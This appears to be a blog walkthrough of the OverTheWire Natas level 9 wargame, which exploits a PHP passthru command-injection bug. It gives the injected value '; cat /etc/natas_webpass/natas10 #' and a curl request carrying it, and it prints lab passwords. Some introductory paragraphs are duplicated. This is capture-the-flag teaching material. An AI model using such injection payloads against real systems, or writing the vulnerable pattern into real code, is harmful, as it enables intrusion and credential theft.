| << Previous challenge |
Recommended reading:
- Command injection
- cat (basic stuff only)
- Basic shell metacharacters
From the credentials discovered from the previous challenge, head up to http://natas9.natas.labs.overthewire.org and take a look at its content.
This new challenge is pretty different from any other, we're now taking advantage of command injection due to the way the program was designed. The website itself is pretty simple, we can see it's a simple dictionary search, we type what we're searching and it returns the matches. Luckily, and as we've seen in the previous challenges, they disclose the full source code, with makes it pretty simple, here's what we're looking at:
Pretty straightforward, we're already familiar with lines like 24 to 26, I'll skip this, you can look the previous challenges on what they're doing. The only new thing, for some, is the call to the passthru function, I'd recommend you to follow the link to understand what it does, but simply put, it takes whatever string you give it and executes it on the server, doesn't it sound dangerous and exploitable? It is indeed, let's take advantage of it.
There are several ways you can exploit this to get the password for the next level. The way I'm gonna do it is so that it'll work on this level, but not on the next one (which is very similar). This is way is also pretty standard, meaning I don't even need to know what the server is doing in passthru. Let's get the command to inject:
With this command, the passthru will execute the following code:
What we're doing here is pretty simple, ; is a command separator, so we're ignoring whatever happens before it (executing grep -i will return a bad usage, but it's irrelevant), then we use cat to get the content of the file (the link in level00 tells where the password files are) and finally, the # marks the start of a comment, so whatever is after is ignored.
Simply paste the command on the form, or go fancy and use curl to do it:
Which will gives the following output:
And as expected, on line 21 we get the password for natas10.
This new challenge is pretty different from any other, we're now taking advantage of command injection due to the way the program was designed. The website itself is pretty simple, we can see it's a simple dictionary search, we type what we're searching and it returns the matches. Luckily, and as we've seen in the previous challenges, they disclose the full source code, with makes it pretty simple, here's what we're looking at:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 | <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head> <body> <h1>natas9</h1> <div id="content"> <form> Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br> </form> Output: <pre> <? $key = ""; if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; } if($key != "") { passthru("grep -i $key dictionary.txt"); } ?> </pre> <div id="viewsource"><a href="index-source.html">View sourcecode</a></div> </div> </body> </html> |
There are several ways you can exploit this to get the password for the next level. The way I'm gonna do it is so that it'll work on this level, but not on the next one (which is very similar). This is way is also pretty standard, meaning I don't even need to know what the server is doing in passthru. Let's get the command to inject:
; cat /etc/natas_webpass/natas10 #
grep -i ; cat /etc/natas_webpass/natas10 # dictionary.txt
Simply paste the command on the form, or go fancy and use curl to do it:
curl --data "needle=; cat /etc/natas_webpass/natas10 #" http://natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl@natas9.natas.labs.overthewire.org/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head> <body> <h1>natas9</h1> <div id="content"> <form> Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br> </form> Output: <pre> nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu </pre> <div id="viewsource"><a href="index-source.html">View sourcecode</a></div> </div> </body> </html> |
| User | natas10 |
| Password | nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu |
Simple and fun challenge, some creativity and command knowledge starts to take place, the next challenge will focus on the same thing but will show some preventive measures. We also had the chance to see how dangerous functions like passthru, exec, eval, etc can be.
Never Settle,
| << Previous challenge |
No comments:
Post a Comment